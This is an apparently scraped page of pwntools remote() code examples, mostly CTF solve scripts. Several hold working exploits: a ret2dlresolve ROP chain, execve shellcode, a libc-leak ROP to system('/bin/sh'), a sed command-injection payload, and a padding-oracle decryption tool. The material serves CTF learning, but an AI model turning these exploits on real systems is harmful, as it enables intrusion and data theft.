Esempio n. 1
0
def encrypt(m, r=1):
    conn = remote(HOST, PORT)
    conn.recv(1024)
    conn.sendline(str(m))
    conn.recv(1024)
    conn.sendline(str(r))
    ret = int(conn.recv(1024).split(" ")[1])
    conn.close()
    return ret
Esempio n. 2
0
def solve():
    r = pwn.remote('shopping.ctf.site', 21111)
    #while True:
    l = r.recvline().strip('\n')
    print(l)
    if(l.startswith('Enter a raw string (max. 32 bytes) that meets the following condition: hex(sha1(input))[0:6] ==')):
        hexedval = l.replace('Enter a raw string (max. 32 bytes) that meets the following condition: hex(sha1(input))[0:6] == ', '')
        payload = brute_sha1hex(hexedval)
        print ('Found payload={}'.format(payload))
        r.writeline(payload)
    r.interactive()
Esempio n. 3
0
def main():
    import pwn
    host, port = "cm2k-sorcery_13de8e6bf26e435fc43efaf46b488eae.quals.shallweplayaga.me", 12002
    r = pwn.remote(host, port)
    print r.readuntil("newline\n")
    while True:
        filename = r.readuntil("\n").strip("\n")
        print filename
        sol = solve(filename)
        print repr(sol)
        data = sol.encode("base64")
        print "Send this:" + data
        r.send(data)
Esempio n. 4
0
def leaker(port):
    r = pwn.remote('localhost', port = port)
    d = r.recv(8)
    func = pwn.p32
    if len(d) == 8:
        func = pwn.p64
    def l(addr):
        r.send(pwn.flat(addr, func = func))
        d = r.recv(8)
        if d is None or len(d) == 0:
            raise 'Peer closed connection'
        return d
    return l
Esempio n. 5
0
def main():
    #solve("65cb596908789372c2d6fbeb0ac3a0e3a1089039138711a016ec3994ad5c7f10")
    import pwn
    host, port = "cm2k-magic_b46299df0752c152a8e0c5f0a9e5b8f0.quals.shallweplayaga.me", 12001
    r = pwn.remote(host, port)
    print r.readuntil("newline\n")
    while True:
        filename = r.readuntil("\n").strip("\n")
        print filename
        sol = solve(filename)
        print repr(sol)
        data = sol.encode("base64")
        print "Send this:" + data
        r.send(data)
Esempio n. 6
0
def main():
	r = remote("120.27.4.96", 14000)
	# r = process("rsa3.py")
	verify(r)
	r.readuntil("token: ")
	token = "d58c9a2aca58a3f2faf17ec5e7deaec6ZHSBHK6e"
	r.sendline(token)
	r.readuntil("P: ")
	P = r.readline().strip()
	P = int(P[2:-1], 16)

	r.readuntil('key:')
	b = getRandomNBitInteger(m/4)
	r.sendline(str(b))

	r.readuntil("n: ")
	n = r.readline().strip()
	n = int(n[2:-1], 16)
	e = 0x10001
	r.readuntil("e2: ")
	e2 = r.readline().strip()
	e2 = int(e2[2:], 16)
	r.readuntil("flag is: ")
	flag = r.readline().strip()
	flag = int(flag[2:-1], 16)
	r.close()
	print "n: ", hex(n)
	print "e: ", hex(e)
	print "e2: ", hex(e2)
	print "flag: ", hex(flag)
	print "=======start attack====="
	t = get_bit(n, 1024, 1)
	print "t: ", hex(t)
	s = pi_sit_x1(o, t)
	print "s: ", hex(s)
	attack_spub = get_bit(s, m, 0)
	# if attack_spub == spub:
	# 	return True
	# else:
	# 	t += 1
	# 	s = pi_sit_x1(o, t)
	# 	attack_spub = get_bit(s, m, 0)
	# 	if attack_spub == spub:
	# 		return True
	# 	else:
	# 		raw_input()
	# 		return False
	attack_spriv = pow(attack_spub, b, P)
	print "spub: ", hex(attack_spub)
	print "spriv: ", hex(attack_spriv)
Esempio n. 7
0
def connect(url, sid=None, data=None, gdb=False):
    s = pwn.remote(REMOTE[0], REMOTE[1])
    s.sendline(('GET /?' if not data else 'POST /?') + url + ' HTTP/1.1\r')
    s.sendline('Host: firmware.insomni.hack\r')
    s.sendline('Connection: keep-alive\r')
    if sid:
        s.sendline('Cookie: sid=' + sid + '\r')
    if data:
        s.sendline('Content-length: ' + str(len(data)) + '\r')
    s.sendline('\r')
    if data:
        import time
        time.sleep(1)
        s.send(data)
    return s
Esempio n. 8
0
 def __init__(self, user, passwd):
     prog = log.progress('Logging in...')
     p = remote('ptt.cc', 23)
     p.recvrepeat(0.1)  # Login screen
     p.sendline(user + ',\r')
     p.recvrepeat(0.1)  # Enter password
     p.sendline(passwd + '\r')
     if p.recvrepeat(1).find('您想刪除其他重複登入的連線嗎') != -1:
         p.sendline('n\r')
     p.recvuntil('請按任意鍵繼續')
     p.sendline('\r')
     p.recvrepeat(0.1)
     prog.success('Done')
     self.p = p
     self._board = None
     self._article = None
Esempio n. 9
0
def rand_login():
    s = remote(HOST, PORT)

    # login
    s.recvuntil(': ')
    user = choice(users.keys())
    s.sendline(user)

    # pass
    # Sometimes log in correctly, otherwise use a random pass
    # Never login as clinton
    s.recvuntil(': ')
    pwd = users[user] if user != 'clinton' and random() < 0.25 else ''.join([choice(ascii) for j in xrange(randint(5, 50))])
    s.sendline(pwd)

    s.recvall()
    s.close()
Esempio n. 10
0
def exploit(ip, port, flag_id):
    pwn.context(timeout=10)
    dict_id = "".join(random.choice(string.ascii_letters) for i in range(30))
    word = "".join(random.choice(string.ascii_letters) for i in range(30))
    payload = "{} 0a DELIM s/{}/cat {}/e".format("".join(random.choice(string.ascii_letters) for i in range(30)), word, flag_id)
    r = pwn.remote(ip, port)
    r.recvline()
    r.send("dict {}\n".format(dict_id))
    info = r.recvline()
    m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info)
    byte = int(m.group(1), 16)
    r.send(''.join(chr(ord(c) ^ byte) for c in payload).encode('hex') + '\n')
    r.recvline()
    r.send("translate {}\n".format(word))
    r.send('quit\n')
    r.recvline()
    flagline = r.recvline()
    flag = re.match("s/secretik/(.*)/gi;", flagline).group(1)
    return {"FLAG" : flag}
Esempio n. 11
0
def legit_login():
    # Send it into lockdown
    s = remote(HOST, PORT)
    user = '******'

    # login
    s.recvuntil(': ')
    s.sendline(user)

    # pass
    s.recvuntil(': ')
    s.sendline(users[user])

    # rekt
    s.recvuntil(': ')
    s.sendline('uhhh....China?')

    s.recvall()
    s.close()
Esempio n. 12
0
def main():
	r = remote("115.159.191.193", 12000)
	# r = process("rsa1.py")
	verify(r)
	r.readuntil("token: ")
	token = "81755de89626aba8db7de4c93e658b68wBJekMIo"
	r.sendline(token)

	r.readuntil("n: ")
	n = r.readline().strip()
	n = int(n[2:-1], 16)

	r.readuntil("e: ")
	e = r.readline().strip()
	e = int(e[2:-1], 16)

	r.readuntil("is: ")
	enc_flag = r.readline().strip()
	enc_flag = int(enc_flag[2:-1], 16)

	print "We know:"
	print "n: ", hex(n)
	print "e: ", hex(e)
	print "flag: ", hex(enc_flag)

	print "=======Start Attack======"
	t = pi_b(e)
	print "get t = ", hex(t)
	phi_n = wiener_attack(t, n)
	try:
		u = invmod(t, phi_n)
	except:
		return False
	print "get u = ", hex(u)
	qq, pp = divide_pq(u*t, n)
	print "get p = ", hex(pp)
	print "get q = ", hex(qq)
	d = invmod(e, (qq-1)*(pp-1))
	print "get d = ", hex(d)
	flag = pow(enc_flag, d, n)
	print "get flag: ", long_to_bytes(flag)
Esempio n. 13
0
def solve():
    r = pwn.remote('misc.chal.csaw.io',4239)
    print(r.recvline())
    result_string1 = '';
    result_string2 = '';
    while True:
        l1 = r.recvline().strip('\n')
        l2 = l1[1:10]
        parity = bit_xor(l2)
        print('InitialMessage={} WithoutStartStop={} Parity={}'.format(l1, l2, parity))
        if(parity == 0):
            l3 = l2[0:8]
            unb = pwn.unbits(l3)
            print('Parity! Without parity bit={} unb={}'.format(l3, unb))
            result_string1 = result_string1 + unb
            print(result_string1)
            result_string2 = result_string2 + l3;
            print(pwn.unbits(result_string2))
            r.writeline('1')
        else:
            r.writeline('0')
Esempio n. 14
0
def set_flag(ip, port, flag):
    pwn.context(timeout=10)
    flag_id = "".join(random.choice(string.ascii_letters) for i in range(30))
    token = "".join(random.choice(string.ascii_letters) for i in range(30))    
    r = pwn.remote(ip, port)    
    if not r.recvline() == 'Welcome to the NADMOZG translator service!\n':
        raise RuntimeError("Wrong banner")
    r.send("dict {}\n".format(flag_id))
    info = r.recvline()
    m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info)
    if not m:
        raise RuntimeError("Wrong password request")
    byte = int(m.group(1), 16)
    r.send(''.join(chr(ord(c) ^ byte) for c in token).encode('hex') + '\n')
    if not r.recvline() == "Dictionary created\n":
        raise RuntimeError("Can't create dictionary")
    r.send("add secretik {}\n".format(flag))
    if not r.recvline() == "Word saved!\n":
        raise RuntimeError("Can't store word")
    r.send("quit\n")
    if not r.recvall() == "Good bye!\n":
        raise RuntimeError("Wrong goodbye")
    return {"FLAG_ID" : flag_id, "TOKEN" : token}
Esempio n. 15
0
def get_flag(ip, port, flag_id, token):
    pwn.context(timeout=10)
    r = pwn.remote(ip, port)
    if not r.recvline() == 'Welcome to the NADMOZG translator service!\n':
        raise RuntimeError("Wrong banner")
    r.send("dict {}\n".format(flag_id))
    info = r.recvline()
    m = re.match("Please enter your alphanumeric password xored with byte 0x([0-9A-F]{2}) and hex encoded:\n", info)
    if not m:
        raise RuntimeError("Wrong password request")
    byte = int(m.group(1), 16)
    r.send(''.join(chr(ord(c) ^ byte) for c in token).encode('hex') + '\n')
    if not r.recvline() == 'Password ok!\n':
        raise RuntimeError("Can't load dictionary")
    if not r.recvline() == 'Dictionary loaded\n':
        raise RuntimeError("Can't load dictionary")
    r.send("translate secretik\n")
    flag = r.recvline().strip()
    if not flag != "secretik":
        raise RuntimeError("Flag not present or deleted")
    r.send("quit\n")
    if not r.recvall() == "Good bye!\n":
        raise RuntimeError("Wrong goodbye")
    return {"FLAG" : flag}
Esempio n. 16
0
def main():
	r = remote("115.159.191.193", 13000)
	# r = process("rsa2.py")
	verify(r)
	r.readuntil("token: ")
	token = "d58c9a2aca58a3f2faf17ec5e7deaec6ZHSBHK6e"
	r.sendline(token)

	# r.readuntil("p4: ")
	# p_4 = r.readline().strip()
	# p_4 = int(p_4[2:-1], 16)

	r.readuntil("n: ")
	n = r.readline().strip()
	n = int(n[2:-1], 16)
	e = 0x10001
	r.readuntil("e2: ")
	e2 = r.readline().strip()
	e2 = int(e2[2:], 16)
	print "n: ", hex(n)
	print "e: ", hex(e)
	print "e2: ", hex(e2)
	r.readuntil("flag is: ")
	flag = r.readline().strip()
	flag = int(flag[2:-1], 16)
	print "flag: ", hex(flag)
	print "=======start attack====="
	n1 = get_bit(n, 3*k/8, 1)
	# print "n1: ", hex(n1)
	p4 = pi_b(get_bit(n1, 5*k/16, 0), 0)
	# if p_4 == p4:
	# 	return True
	# else:
	# 	return False
	print "p4: ", hex(p4)
	r.close()
Esempio n. 17
0
import itertools
from pwn import remote

r = remote('ppc1.chal.ctf.westerns.tokyo', 31111)

r.recvuntil('Input: ')

while True:
	print r.recvuntil('Input: ')
	inp = r.recvline().strip().split(' ')
	print inp
	r.recvuntil('Answer: ')

	if int(inp[0]) < 11:
		print "Brute-forcing..."
		for p in itertools.permutations(inp[1:]):
			s = ''.join(p)
			if s == s[::-1]:
				print p
				r.sendline(' '.join(p))
				break

print r.recv()
Esempio n. 18
0
#!/usr/bin/env python2

import pwn

remote = True

flag = ""
last_char = ""
index = 0

while last_char != '}':
    if remote:
        r = pwn.remote("babytrace.quals2019.oooverflow.io", 5000)
    else:
        r = pwn.process("pitas.py")

    # Header
    r.recvuntil("# Are you ready for the PITA?\n\n")

    # Binary select
    r.recvuntil("Choice: ")
    r.sendline("2")

    # start trace
    r.recvuntil("Choice: ")
    r.sendline("1")

    # add input constraint
    r.recvuntil("Choice: ")
    r.sendline("3")
    # r.sendline("input")
Esempio n. 19
0
def run(host,port,cipher,size_block,error,verbose=True):
    cipher       = cipher.upper()
    found        = False
    valide_value = []
    result       = []
    len_block    = size_block*2
    cipher_block = split_len(cipher, len_block)

    if len(cipher_block) == 1:
        print "[-] Abort there is only one block"
        sys.exit()  
    #for each cipher_block
    s=pwn.remote(host,port)
    for block in reversed(range(1,len(cipher_block))):
        if len(cipher_block[block]) != len_block:
            print "[-] Abort length block doesn't match the size_block"
            break
        print "[+] Search value block : ", block, "\n"
        #for each byte of the block
        for i in range(0,size_block):
            # test each byte max 255
            for ct_pos in range(0,256):
                # 1 xor 1 = 0 or valide padding need to be checked
                if ct_pos != i+1 or (len(valide_value) > 0  and int(valide_value[-1],16) == ct_pos):

                    bk = block_search_byte(size_block, i, ct_pos, valide_value) 
                    bp = cipher_block[block-1]
                    bc = block_padding(size_block, i) 

                    tmp = hex_xor(bk,bp)
                    cb  = hex_xor(tmp,bc).upper()

                    up_cipher  = cb + cipher_block[block]
                    #time.sleep(0.5)

                    # we call the oracle, our god
                    s.sendline(up_cipher)
                    pr=s.recv()
            
                    if verbose == True:
                        exe = re.findall('..',cb)
                        discover = ('').join(exe[size_block-i:size_block])
                        current =  ('').join(exe[size_block-i-1:size_block-i])
                        find_me =  ('').join(exe[:-i-1])

                        sys.stdout.write("\r[+] Test [Byte %03i/256 - Block %d ]: \033[31m%s\033[33m%s\033[36m%s\033[0m \n" % (ct_pos, block, find_me, current, discover))
                        sys.stdout.flush()

                    if pr.find(error)==-1:

                        found = True
                        #connection.close()
                        
                        # data analyse and insert in rigth order
                        value = re.findall('..',bk)
                        valide_value.insert(0,value[size_block-(i+1)])

                        if verbose == True:
                            print ''
                            
                            print "[+] Block M_Byte : %s\n"% bk
                            print "[+] Block C_{i-1}: %s\n"% bp
                            print "[+] Block Padding: %s\n"% bc
                            print ''

                        bytes_found = ''.join(valide_value)
                        if i == 0 and bytes_found.decode("hex") > hex(size_block) and block == len(cipher_block)-1:
                            print "[-] Error decryption failed the padding is > "+str(size_block)
                            sys.exit()

                        print '\033[36m' + '\033[1m' + "[+]" + '\033[0m' + " Found", i+1,  "bytes :", bytes_found
                        print ''

                        break 
            if found == False:
                # lets say padding is 01 for the last byte of the last block (the padding block)
                if len(cipher_block)-1 == block and i == 0:
                    value = re.findall('..',bk)
                    print value
                    valide_value.insert(0,"01")
                    if verbose == True:
                        print ''
                        print '[-] No padding found, but maybe the padding is length 01 :)'
                        print "[+] Block M_Byte : %s"% bk
                        print "[+] Block C_{i-1}: %s"% bp
                        print "[+] Block Padding: %s"% bc
                        print ''
                        bytes_found = ''.join(valide_value)
                else:
                    print "\n[-] Error decryption failed"
                    result.insert(0, ''.join(valide_value))
                    hex_r = ''.join(result)
                    print "[+] Partial Decrypted value (HEX):", hex_r.upper()
                    padding = int(hex_r[len(hex_r)-2:len(hex_r)],16)
                    print "[+] Partial Decrypted value (ASCII):", hex_r[0:-(padding*2)].decode("hex")
                    sys.exit()
            found = False

        result.insert(0, ''.join(valide_value))
        valide_value = []

    print ''
    hex_r = ''.join(result)
    print "[+] Decrypted value (HEX):", hex_r.upper()
    padding = int(hex_r[len(hex_r)-2:len(hex_r)],16)
    print "[+] Decrypted value (ASCII):", hex_r[0:-(padding*2)].decode("hex")
Esempio n. 20
0
import pwn
import itertools
import string
import hashlib
import sympy # perfect_power
from Crypto.Util.number import isPrime


#import Crypto.Util as Cr
#import isPrime from Crypto.Util.number

r = pwn.remote('secuprim.asis-ctf.ir',42738)

print(r.recvline())
print(r.recvline())
bot_task = r.recvline()
print(bot_task)
print(r.recvline())

def bruteforce(charset, minlength, maxlength):
    return (''.join(candidate)
        for candidate in itertools.chain.from_iterable(itertools.product(charset, repeat=i)
        for i in range(minlength, maxlength + 1)))

key_part_2 = bot_task[12:34]
print('part2=')
print(key_part_2)

sha_key = bot_task[52:84]
print('sha_key_starts with')
print(sha_key)
Esempio n. 21
0
import pwn
import sys
if '--remote' in sys.argv:
    p = pwn.remote("chall.pwnable.tw", 10001)
else:
    p = pwn.process("./orw")
output = p.recv(len("Give my your shellcode:"))

shellcode = open("shellcode.bin", 'rb').read()
assert len(shellcode) < 200
p.send(shellcode)
output = p.recvall()
print(output)
Esempio n. 22
0
import pwn

pwn.context.binary = e = pwn.ELF("./resolve")

# p = pwn.process("./resolve")
p = pwn.remote("pwn.utctf.live", 5435)

if pwn.args.GDB:
    pwn.gdb.attach(
        p,
        gdbscript="""
break *(&main+29)
continue
    """,
    )

r = pwn.ROP(e)
d = pwn.Ret2dlresolvePayload(e, symbol="system", args=["sh"])
r.raw(0x401159)  # ret gadget to align stack
r.gets(d.data_addr)
r.ret2dlresolve(d)

payload = pwn.fit({0x10: r.chain()}) + b"\n" + d.payload
p.sendline(payload)
p.interactive()
Esempio n. 23
0
#/usr/bin/python3

import pwn
import sys

e = pwn.ELF('chall')
p = pwn.remote('pwn.ctf.zer0pts.com', 9011)
p.recvuntil("Data: ")
pld = 0x100 * b"A"
pld += pwn.p64(e.symbols['__stack_shadow'] + 0x100)
p.sendline(pld)

p.recvuntil("Data: ")
pld = b"A" * 8 + pwn.p64(e.symbols['__stack_shadow'] + 16)
pld += b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"

p.sendline(pld)
p.interactive()

# zer0pts{1nt3rm3d14t3_pwn3r5_l1k3_2_0v3rwr1t3_s4v3d_RBP}
Esempio n. 24
0
            break


def pwn_retrive_record(p, pwnstring):
    p.readuntil('What do you want to do?\n')
    p.sendline('3')
    p.readuntil('identifier: ')
    p.sendline(pwnstring)

    p.readuntil('you are: ')
    flag = p.readline()

    return flag


def pwn_exit(p):
    p.readuntil('What do you want to do? ')
    p.sendline('4')


p = pwn.remote(team_ip, team_port)

#record_b64 = 'a:1:{i:0;O:6:"Record":1:{s:10:"identifier";s:6:' + base64.b64encode(queryid.encode("utf-8")) + ';}}'

#pwn_store_record(p, pwnstring)
#pwn_retrive_record(p, record_b64)

pwn_python(p)

pwn_exit(p)
Esempio n. 25
0
#!/usr/bin/env python3

from pwn import process, remote
from base64 import b64decode, b64encode

# io = process(["python", "chal.py"])
io = remote("cbcbc.chal.acsc.asia", 52171)
io.sendlineafter(b"> ", b"1")
io.sendlineafter(b"username: "******"")
io.recvuntil(b"token: \n")
enc = b64decode(io.recvline().strip())
iv1, iv2, ct = enc[:16], enc[16:32], enc[32:]


def oracle(iv, block):
    enc = iv + iv2 + block
    io.sendlineafter(b"> ", b"2")
    io.sendlineafter(b"username: "******"l3o")
    io.sendlineafter(b"token: ", b64encode(enc))
    r = io.recvlineS()
    return "Check your token again" not in r


def oracle2(iv, block):
    enc = iv1 + iv + block
    io.sendlineafter(b"> ", b"2")
    io.sendlineafter(b"username: "******"l3o")
    io.sendlineafter(b"token: ", b64encode(enc))
    r = io.recvlineS()
    return "Check your token again" not in r
Esempio n. 26
0
import pwn
import base64
import os

print "Started!"
r = pwn.remote("crypto.chal.csaw.io", 8000)

l1 = r.recvall(timeout = 5)
print(l1)

print('START DECODING')
decoded_str = base64.b64decode(l1)
decoded_str2 = base64.b64decode(l1[::-1])
print ('DECODE FINISHED')
# print(decoded_str)

print('CREATING FILE')
f = open('/root/Desktop/github/RT_CTF/csaw/sleeping_guard.png', 'wb')
f.write(decoded_str)
f.close()

f = open('/root/Desktop/github/RT_CTF/csaw/sleeping_guard2.png', 'wb')
f.write(decoded_str2)
f.close()
Esempio n. 27
0
    vec = []
    while length > _sage_const_0:
        vec = [num % q] + vec
        num //= q
        length -= _sage_const_1
    return vec


def to_mat(numlist):
    M = []
    for i in numlist:
        M.append(to_vec(i, _sage_const_40))
    return M


CON = pwn.remote('172.27.176.1', _sage_const_10000)
resp = CON.recvuntil('key1:\n').decode().split('\n')
n = int(resp[_sage_const_0])
e = _sage_const_65537
enc = int(resp[_sage_const_3])
for _ in range(_sage_const_14):
    CON.sendline(str(shiftf0(enc, _)).encode())
    resp = CON.recvuntil('key1:\n').decode()
    print(_, resp)
CON.sendline(str(shiftf0(enc, _ + _sage_const_1)).encode())
resp = CON.recvuntil('key2:\n').decode().split('\n')

_res = resp[_sage_const_0][_sage_const_29:-_sage_const_1].split(',')
res = []
for i in _res:
    res += [int(i)]
Esempio n. 28
0
import base64


def shift(i, cs):
    plaintext = copy.copy(cs)
    for idx, c in enumerate(cs):
        v = ord(c)
        p = i + ord(c)
        if v >= 97 and v <= 122 and p > 122 or v >= 65 and v <= 90 and p > 90:
            plaintext[idx] = chr(p - 26)
        elif v >= 97 and v <= 122 or v >= 65 and v <= 90:
            plaintext[idx] = chr(p)
    return plaintext


r = remote("140.112.31.109", 10000)
# round 1
xs = r.recv(timeout=0.1).decode("utf-8").split("\n")
xs += r.recv(timeout=0.1).decode("utf-8").split("\n")
# I don't know why it can't read in one time. A single line works in ipython.
ss = []
for line in xs:
    print(line)
    if line[:2] == "m1" or line[:2] == "c1" or line[:2] == "c2":
        ss = ss + [line]
ss = [line[5:] for line in ss]
codebook = {}
nShift = ord(ss[0][0]) - ord(ss[1][0])
if nShift < 0:
    nShift += 26
plaintext = list(ss[2])
Esempio n. 29
0

def next_name(name):
    assert len(name) == 4
    h = struct.unpack('<i', name)[0] ^ 0x12345678
    while True:
        h += 1
        name = struct.pack('<i', h ^ 0x12345678)
        if not (b' ' in name or b'\0' in name or b'\r' in name or b'\n' in name
                or b'\t' in name or b'\x0b' in name or b'\x0c' in name):
            break
    return name


# r = process(['./exceptional'])
r = remote('exceptional.2020.ctfcompetition.com', 1337)
# This is to point to a "fake" city with hash 0 so that its name is the flag:
override_val = (0x7440 - 0x10 - 0x7120) // 4
to_override = struct.pack('<I', override_val ^ 0x12345678)

# Build a tree with root val 2, one left child with val -1, and a long right
# tail so that we overflow the stack upon searching it

name = struct.pack('<I', 2 ^ 0x12345678)
init = name
name = next_name(name)
names = []
for i in range(99):
    names.append(name)
    name = next_name(name)
Esempio n. 30
0
def call_oracle(host,cookie,url,post,method,up_cipher):
    s=pwn.remote(host,51014)
    return s
Esempio n. 31
0
#!/usr/bin/env python3
from itertools import product
import pwn
import itertools
import hashlib

pwn.context.log_level = 'DEBUG'
IP, PORT = 'dodge.ctf.defenit.kr', 1357
p = pwn.remote(IP, PORT)

WIDTH, HEIGHT = 40, 20


def PoW():
    target = p.recvline(keepends=False)[-33:-1].decode()
    assert len(target) == 32
    for i in range(1 << 24):
        cand = i.to_bytes(3, 'big')
        if hashlib.md5(cand).hexdigest() == target:
            pwn.log.info('PoW done')
            p.send(cand)
            break
    p.recvuntil('q, e : move focus(*)\nw, a, s, d : move player(p)\n')


def recvMap():
    Map = []
    p.recvuntil('##########################################\n')
    for _ in range(HEIGHT):
        row = list(p.recvline(keepends=False).decode().strip('#'))
        Map.append(row)
Esempio n. 32
0

def proof(END, HASH):
    table = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
    for i in table:
        for j in table:
            for k in table:
                for l in table:
                    STR = i + j + k + l + END
                    if sha256(STR.encode()).hexdigest() == HASH:
                        print(i + j + k + l)
                        return i + j + k + l


pt = b"Hello, I'm a Bytedancer. Please give me the flag!"
con = pwn.remote('39.105.181.182', 30001)
resp = con.recvuntil('> ').decode().split('\n')[-2]
END = resp[12:40]
HASH = resp[45:]
con.sendline(proof(END, HASH).encode())
resp = con.recvuntil('> ').decode()
con.sendline(('0' * 1024).encode())
resp = con.recvuntil('> ').decode()
tmp = int(resp.split('\n')[1][32:34], 16)
END = hex(tmp ^ 1)[2:].ljust(2, '0')
DATA = ['0'] * 1022 + [END[0], END[1]]
roundnum = ''
TABLE = [50, 250, 450]
for i in range(49):
    sleep(1)
    idx = TABLE[i % 3]
Esempio n. 33
0
    p.recvuntil(b"> ")
    p.sendline(b"A")
    p.recvuntil(b"> ")
    p.sendline(employee_name)


def change_employee(employee_num, employee_new_name):
    p.recvuntil(b"> ")
    p.sendline(b"C")
    p.recvuntil(b"> ")
    p.sendline("%d" % employee_num)
    p.recvuntil(b"> ")
    p.sendline(employee_new_name)


p = remote("challenges.ctf.kaf.sh", 8000)
#p = process('./shadowstuck', env={"LD_PRELOAD":"./libc-2.31.so"})

libc = ELF('./libc-2.31.so')

base_shadowstack = int(p.recvline().split(b'at ')[1][:-1], 16)
print("[+] Shadowstack @ 0x%x" % base_shadowstack)

add_employee("Mike")  #0

fire_employee("Mike", b'a' * 0x10 + pack(base_shadowstack)[:-2])
leak = unpack(read_employee(1).ljust(8, b'\x00'))
print("[+] Leak libc @ 0x%x" % leak)
libc.address = leak - 159923
print("[+] Libc @ 0x%x" % libc.address)
Esempio n. 34
0
#!/usr/bin/env python3

import pwn

rem = pwn.remote('chall.pwnable.tw', 10101)
libc = pwn.ELF('./libc_32.so.6')
rem.recvuntil(':')

rem.sendline('A' * 24)
rem.recvline()
libc_leak = b'\x00' + rem.recvuntil(':')[0:3]
libc_leak = pwn.u32(libc_leak)

leak_offset = libc.get_section_by_name('.got.plt').header.sh_addr
libc_base = libc_leak - leak_offset
system_addr = libc_base + libc.symbols[b'system']
bin_sh_addr = libc_base + list(libc.search(b'/bin/sh\x00'))[0]

num = 35
rem.sendline(str(num))

# 24 zeros
for _ in range(24):
    rem.recvuntil(': ')
    rem.sendline('0')

# canary
rem.recvuntil(': ')
rem.sendline('+')

# system address
Esempio n. 35
0
#!/usr/bin/env python3
from pwn import process, context, ELF, remote, u32, pause
from fastpwn import pack, aslr, log
from time import sleep
from sys import argv
if len(argv) > 1 and argv[1] == "-r":
    p = remote("chall.pwnable.tw", 10101)
else:
    p = process('./dubblesort', env={'LD_LIBRARY_PATH': './'})
context.log_level = 'DEBUG'
elf = ELF('./libc_32.so.6', checksec=False)

mov_ebx_esp = pack.pk32(0x00000750)  # mov ebx, [esp] ; ret
n = lambda x: "A" * (x * 4)


def s(
    i,
    un=""
):  # s() func is an idea i got from reading r4j's exploit pocs, great job man :)
    if un:
        p.recvuntil(str(un))
        p.sendline(str(i))
    else:
        p.sendline(str(i))


#p.interactive()            # reason for leak is due to strong not being null terminated
# printf will continue to read and write until it reaches a null terminator.
# 6 DWORDS is offset to .got.plt leak
Esempio n. 36
0
#!/usr/bin/env python
import pwn

# attack = pwn.process('./bof')
attack = pwn.remote('pwnable.kr', 9000)

payload = 52 * 'a'
# print payload
payload += pwn.p32(0xcafebabe)

# attack.recvuntil("overflow me :")
attack.send(payload)

attack.interactive()
Esempio n. 37
0
    def oracle(self, data, **kwargs):
        somecookie = byte_to_hex(data)
        print(somecookie)

        if somecookie[32:] == "00000000000000000000000000000000":
            if somecookie[:30] == "000000000000000000000000000000":
                if somecookie[30:32] != '24':
                    raise BadPaddingException()
            elif somecookie[:28] == "0000000000000000000000000000":
                if somecookie[28:30] != '6C':
                    raise BadPaddingException()
            elif somecookie[:26] == "00000000000000000000000000":
                if somecookie[26:28] != 'AC':
                    raise BadPaddingException()
            elif somecookie[:24] == "000000000000000000000000":
                if somecookie[24:26] != 'A7':
                    raise BadPaddingException()
            elif somecookie[:22] == "0000000000000000000000":
                if somecookie[22:24] != '6F':
                    raise BadPaddingException()
            elif somecookie[:20] == "00000000000000000000":
                if somecookie[20:22] != '19':
                    raise BadPaddingException()
            elif somecookie[:18] == "000000000000000000":
                if somecookie[18:20] != '78':
                    raise BadPaddingException()
            elif somecookie[:16] == "0000000000000000":
                if somecookie[16:18] != '62':
                    raise BadPaddingException()
            elif somecookie[:14] == "00000000000000":
                if somecookie[14:16] != 'D7':
                    raise BadPaddingException()
            elif somecookie[:12] == "000000000000":
                if somecookie[12:14] != 'D2':
                    raise BadPaddingException()
            elif somecookie[:10] == "0000000000":
                if somecookie[10:12] != '8F':
                    raise BadPaddingException()
            elif somecookie[:8] == "00000000":
                if somecookie[8:10] != '71':
                    raise BadPaddingException()
            elif somecookie[:6] == "000000":
                if somecookie[6:8] != '27':
                    raise BadPaddingException()
            elif somecookie[:4] == "0000":
                if somecookie[4:6] != 'AF':
                    raise BadPaddingException()
            elif somecookie[:2] == "00":
                if somecookie[2:4] != '96':
                    raise BadPaddingException()
            elif somecookie[0:2] != '32':
                raise BadPaddingException()
        elif somecookie[32:] == "5F96AE25728BD7D165701065ACA0612A":
            if somecookie[:30] == "000000000000000000000000000000":
                if somecookie[30:32] != '9B':
                    raise BadPaddingException()
            elif somecookie[:28] == "0000000000000000000000000000":
                if somecookie[28:30] != '3D':
                    raise BadPaddingException()
            elif somecookie[:26] == "00000000000000000000000000":
                if somecookie[26:28] != 'D4':
                    raise BadPaddingException()
            elif somecookie[:24] == "000000000000000000000000":
                if somecookie[24:26] != '76':
                    raise BadPaddingException()
            elif somecookie[:22] == "0000000000000000000000":
                if somecookie[22:24] != '63':
                    raise BadPaddingException()
            elif somecookie[:20] == "00000000000000000000":
                if somecookie[20:22] != '41':
                    raise BadPaddingException()
            elif somecookie[:18] == "000000000000000000":
                if somecookie[18:20] != 'C5':
                    raise BadPaddingException()
            elif somecookie[:16] == "0000000000000000":
                if somecookie[16:18] != '9C':
                    raise BadPaddingException()
            elif somecookie[:14] == "00000000000000":
                if somecookie[14:16] != '0B':
                    raise BadPaddingException()
            elif somecookie[:12] == "000000000000":
                if somecookie[12:14] != '63':
                    raise BadPaddingException()
            elif somecookie[:10] == "0000000000":
                if somecookie[10:12] != 'FD':
                    raise BadPaddingException()
            elif somecookie[:8] == "00000000":
                if somecookie[8:10] != '80':
                    raise BadPaddingException()
            #elif somecookie[:6] == "000000":
            #    if somecookie[6:8] != '':
            #    raise BadPaddingException()
            #elif somecookie[:4] == "0000":
            #    if somecookie[4:6] != '':
            #    raise BadPaddingException()
            #elif somecookie[:2] == "00":
            #    if somecookie[2:4] != '':
            #    raise BadPaddingException()
            #elif somecookie[0:2] != '':
            #    raise BadPaddingException()
        #elif somecookie[32:] == "5F96AE25728BD7D165701065ACA0612A":
        #if somecookie[:30] == "000000000000000000000000000000":
        #    if somecookie[30:32] != '9B':
        #    raise BadPaddingException()
        #elif somecookie[:28] == "0000000000000000000000000000":
        #    if somecookie[28:30] != '':
        #    raise BadPaddingException()
        #elif somecookie[:26] == "00000000000000000000000000":
        #    if somecookie[26:28] != '':
        #    raise BadPaddingException()
        #elif somecookie[:24] == "000000000000000000000000":
